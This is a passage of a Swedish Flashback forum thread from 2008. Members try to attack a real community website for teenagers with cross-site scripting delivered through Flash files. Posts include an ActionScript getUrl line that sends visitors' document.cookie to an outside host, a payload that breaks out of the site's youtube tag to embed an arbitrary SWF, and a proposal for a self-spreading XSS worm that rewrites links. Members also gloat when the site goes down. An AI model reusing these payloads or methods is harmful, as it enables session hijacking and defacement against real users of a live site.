Vinnaren i pepparkakshustävlingen!
2008-03-12, 18:00
  #25
Avstängd
Hihi, såja.

Dragit upp en lite flash med XSS i.
Verkar dock som att det inte går att hijacka sessionsen, hur gör man för att komma förbi detta? Funkar inte att ändra sessionen bara.. Utloggad direkt....
Citera
2008-03-12, 18:12
  #26
Medlem
Chernobyls avatar
usch och blä, borde vara lag på sådana sidor
Citera
2008-03-12, 18:17
  #27
Medlem
00010000s avatar
Citat:
Ursprungligen postat av p0ng
Hihi, såja.

Dragit upp en lite flash med XSS i.
Verkar dock som att det inte går att hijacka sessionsen, hur gör man för att komma förbi detta? Funkar inte att ändra sessionen bara.. Utloggad direkt....
Hur ser ditt actionscript ut i .fla'n?
Jag kikade själv på sendToURL samt några .swf-exploits men fick ingen rätsida på det.

Kollade igenom kakorna också.
Hittade PHPSESSID (dooh, såklart) samt ps-uid men jag har inte fått ut något av värde ur dom.
Citera
2008-03-12, 18:30
  #28
Medlem
p4radoxs avatar
Citat:
Ursprungligen postat av ni-ar-fjortisar
Antar att ägarna har läst tråden. Då onfocus inte fungerar längre
Det stämmer bra, fick ett mail från en av kodarna imorse, där han tackade för tråden. p0ng och han verkar för övrigt vara vänner, baserat på att de vet varandras förnamn och har kontakt över msn, om inte mer.

Med detta i åtanke ber jag nu mod att flytta denna tråd till avancerad datasäkerhet.

EDIT: Den i crew som tackat för tråden är faktiskt medlem på fb, men fyller ännu inte kraven för avancerad datasäkerhet. p0ng har skrivit en del av hans nick tidigare i tråden, om ni undrar vem det är.
__________________
Senast redigerad av p4radox 2008-03-12 kl. 18:34.
Citera
2008-03-12, 18:38
  #29
Avstängd
Japp, jag känner Jine, vi är dock inte bästa vänner.
Han har varit medlem på FB innan, men fick tydligen inte vara med och leka här längre.

Personligen så hatar jag dendär sidan, och alla jävla emos.
Citera
2008-03-12, 19:01
  #30
Medlem
Kuzmins avatar
Citat:
Ursprungligen postat av 00010000
Hur ser ditt actionscript ut i .fla'n?
Jag kikade själv på sendToURL samt några .swf-exploits men fick ingen rätsida på det.

Kollade igenom kakorna också.
Hittade PHPSESSID (dooh, såklart) samt ps-uid men jag har inte fått ut något av värde ur dom.

Fyller bara på med lite information..
getURL fungerar ju med inline javascript.. så om man skulle dra en radda med js-funktioner som.. ändrade sidans utseende.. och kanske gjorde om alla anchor-element till länkar till on.nimp.org skulle funka..

Jag vet ju inte om det här skulle funka, men man borde väl kunna ändra andras pres-ar genom js-et.. så deras sida också visar skiten.. och allt sprids som en trevlig xss-mask..
Citera
2008-03-12, 20:22
  #31
Medlem
Kuzmins avatar
<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/SASjlj5R4U4&hl=en"></param><param name="wmode" value="transparent"></param><embed src="http://data.fuskbugg.se/skalman01/-test.swf" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>

Funkar för övrigt om man vill embedda något, dock lyckades jag inte få till det med xssen..
Citera
2008-03-12, 20:25
  #32
Medlem
p4radoxs avatar
Citat:
Ursprungligen postat av p0ng
Japp, jag känner Jine, vi är dock inte bästa vänner.
Han har varit medlem på FB innan, men fick tydligen inte vara med och leka här längre.

Personligen så hatar jag dendär sidan, och alla jävla emos.
Ett av hans tre konton är avstängt, de två andra är inte det.
Att han fortfarande inte är 18, borde ju medföra en avstängning även på de andra två.

Men nog med OfT, nu försöker vi hålla oss till tråden.

EDIT: Tog bort länkarna till de konton som åsyftades.
__________________
Senast redigerad av p4radox 2008-03-12 kl. 20:33.
Citera
2008-03-12, 20:26
  #33
Medlem
ni-ar-fjortisars avatar
Citat:
Ursprungligen postat av Kuzmin
<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/SASjlj5R4U4&hl=en"></param><param name="wmode" value="transparent"></param><embed src="http://data.fuskbugg.se/skalman01/-test.swf" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>

Funkar för övrigt om man vill embedda något, dock lyckades jag inte få till det med xssen..

Jag har en getUrl("javascript:location.href='http://www.abc.com/s.php?c='+document.cookie;")

Fick det dock inte att fungera och orkade inte lägga ner allt för mycket tid på det
Citera
2008-03-12, 21:55
  #34
Medlem
00010000s avatar
Citat:
Ursprungligen postat av Kuzmin
<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/SASjlj5R4U4&hl=en"></param><param name="wmode" value="transparent"></param><embed src="http://data.fuskbugg.se/skalman01/-test.swf" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>

Funkar för övrigt om man vill embedda något, dock lyckades jag inte få till det med xssen..
Att det går att embeda andra flashfiler än youtube-klipp är redan nämnt, däremot skriver man inte koden du angav eftersom dom ersätter < och >

Vill man ha med swf-filen du nämnde i ditt inlägg får man skriva:

Kod:
<youtube>SASjlj5R4U4" ><embed src="http://data.fuskbugg.se/skalman01/-test.swf"> <param </youtube>

Koden du skrev är ju resultatet som webbservern parsar ut till klienten.

Citat:
Ursprungligen postat av ni-ar-fjortisar
Jag har en getUrl("javascript:location.href='http://www.abc.com/s.php?c='+document.cookie;")

Fick det dock inte att fungera och orkade inte lägga ner allt för mycket tid på det
Jag är inte säker på att det faktiskt fungerar att hämta cookies via xss/javascript med getURL i flash.

Den exploiten upptäcktes runt 2002 (om jag inte minns fel) och jag vette fan om det finns något nytt sätt att göra det på efter att ursprungsexploiten patchades.

p0ng skrev att han hade lyckats snatta cookies via en cookielogger i en flashfil han har däremot inte valt att tala om hur så antingen vill han att vi ska lära oss själva eller så ljuger han när han säger att han gjort det.

Jag hoppas på det förstnämnda.
Citera
2008-03-12, 22:14
  #35
Avstängd
Hihi, ni har lyckats Siten är nere.
vart orsaken (Klicka inte)
Citera
2008-03-12, 22:24
  #36
Medlem
p4radoxs avatar
Citat:
Ursprungligen postat av p0ng
Hihi, ni har lyckats Siten är nere.
vart orsaken (Klicka inte)
Jasså du?
Citat:
Ursprungligen postat av Emocore.se
Anledningen till att vi är nere,
är pga vi fick varningar om ett större problem med siten.
Citera

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback